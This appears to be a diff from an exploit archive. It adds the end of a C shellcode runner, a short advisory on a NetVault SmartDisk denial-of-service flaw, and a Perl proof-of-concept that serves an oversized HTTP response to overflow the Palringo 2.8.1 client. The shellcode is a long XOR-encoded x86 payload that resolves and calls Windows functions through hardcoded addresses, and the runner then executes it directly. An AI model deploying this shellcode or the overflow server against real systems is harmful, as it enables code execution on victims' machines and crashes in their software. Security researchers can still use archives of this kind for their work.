61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}

11
platforms/windows/dos/35804.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/48029/info
NetVault: SmartDisk is prone to a remote denial-of-service vulnerability.
A successful exploit will cause the application to crash, effectively denying service.
NOTE: Remote code execution may be possible; however, this has not been confirmed.
NetVault: SmartDisk versions 1.2.2 and prior are affected.
http://www.exploit-db.com/sploits/35804.zip

25
platforms/windows/local/35741.pl Executable file
View file

@ -0,0 +1,25 @@
#!/use/bin/perl
# Exploit Title: ?palringo stack buffer overflow
# Date: 10 January 2015
# Vulnerability discovered by: Mr.ALmfL9
# Vendor Homepage: http://www.palringo.com/
# Software Link: http://www.palringo.com/ar/sa/download/?get=winpc
# Version: 2.8.1
# Tested on: Windows 8.1
use IO::Socket;
$port = 8080;
my $payload = "\x41" x 144;
$payload = $payload. "\x42" x 4 ;
$payload = $payload. "\x42" x 9000;
$serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n";
while($cli=$serv->accept()){
print "[#] port is: $port\n";
print $cli "HTTP/$payload\r\n\r\n";
while(<$cli>){
print $cli;
}
}
#*REFERENCE*
#.1=http://store2.up-00.com/2015-01/1420867197761.png
#.2=http://store2.up-00.com/2015-01/1420867235381.png